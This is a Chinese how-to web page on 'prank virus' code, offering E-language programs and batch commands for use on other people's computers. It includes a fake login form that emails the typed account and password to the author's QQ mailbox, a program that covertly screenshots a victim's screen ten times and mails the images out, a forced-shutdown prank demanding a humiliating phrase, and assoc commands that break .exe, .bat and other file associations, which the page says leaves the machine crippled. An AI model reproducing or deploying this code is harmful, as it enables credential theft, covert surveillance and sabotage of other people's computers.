当前位置:源码库-建站教程-脚本之家-vbs-vbs整人电脑病毒代码是怎样的

vbs整人电脑病毒代码是怎样的

时间:2016-03-07来源:www.aspku.com 作者:脚本之家文章热度:

计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。这是目前官方最权威的关于计算机病毒的定义,此定义也被通行的《计算机病毒防治产品评级准则》的国家标准所采纳。以下是学习啦网小编为大家整理的关于vbs整人电脑病毒代码的相关知识,希望对大家有所帮助!

易语言整人代码如下

.版本 2

.支持库 OPenGL

.子程序 __启动窗口_创建完毕

运行 (“Shutdown.exe -s -t 120”, 假, )

.子程序 _按钮1_被单击

.如果真 (编辑框1.内容 = “我是蠢猪,***是大好人”)

运行 (“shutdown -a ”, 假, )

信息框 (“哈哈~我还是很厚道的!我也知道你是发自内心的,是啊,我怎么那么完美呢?——呵呵~”, 0, )

结束 ()

.如果真 (编辑框1.内容 ≠ “我是蠢猪,***是大好人”)

信息框 (“尼玛,输入正确会死啊!告诉你了,只要输入正确就OK了~你怎么就不相信我呢??!”, 0, )

—————————————————————————————————————————

易语言骗账号代码如下:

.版本 2

.支持库 internet

.子程序 _按钮1_被单击

连接发信服务器 (“smtp.qq.com”, 25, “邮箱”, “密码”, )

发送邮件 (“号来了”, “账号:” + 编辑框1.内容 + #换行符 + “密码:” + 编辑框2.内容, “邮箱”, , , “邮箱”, )

——————————————————————————————————————————

易语言监视对方电脑,连发十张高清截图代码如下:

.版本 2

.支持库 eImgConverter

.支持库 internet

.子程序 __启动窗口_创建完毕

.计次循环首 (10, )

写到文件 (“D:\jt.bmp”, 快照 (, , ))

转换到JPG (“jt.bmp”, “jt.jpg”, 假, 75, 真, 0)

.如果真 (连接发信服务器 (“smtp.qq.com”, 25, “邮箱”, “密码”, ))

添加附件文件 (“D:\jt.bmp”)

.如果真结束

发送邮件 (“主题”, “被监视的电脑截图”, “邮箱”, , , “邮箱”, )

断开发信服务器 ()

.计次循环尾 ()

删除文件 (“D:\jt.bmp”)

结束 ()

——————————————————————————————————————————

你说要有图片 可以将易语言程序启动窗口主页面的图片设置成我这样

你说要有声音,可以运用以下代码:

.版本 2

.程序集 窗口程序集1

.子程序 _按钮1_被单击

播放MP3 (1, “mp3地址”)

——————————————————————————————————————————

如果是电脑命令的话

新建txt输入:shutdown -s -t 120 -c 你是猪!

保存为bat

或者还有,如果他用电脑命令破解,你就往后输入

@echo off

assoc .bat=txtfile

可以让他所有的电脑命令成为乱码!!!

除了电脑命令乱码,你还可以设置各种的,比如:

assoc .exe=txtfile

assoc .mp3=txtfile

assoc .zip=txtfile

assoc .fiv=txtfile

and so on……

其实输入了就这样的代码,那台电脑基本就瘫痪了,没什么可以玩的了~

相关vbs
相关资源下载
热门标签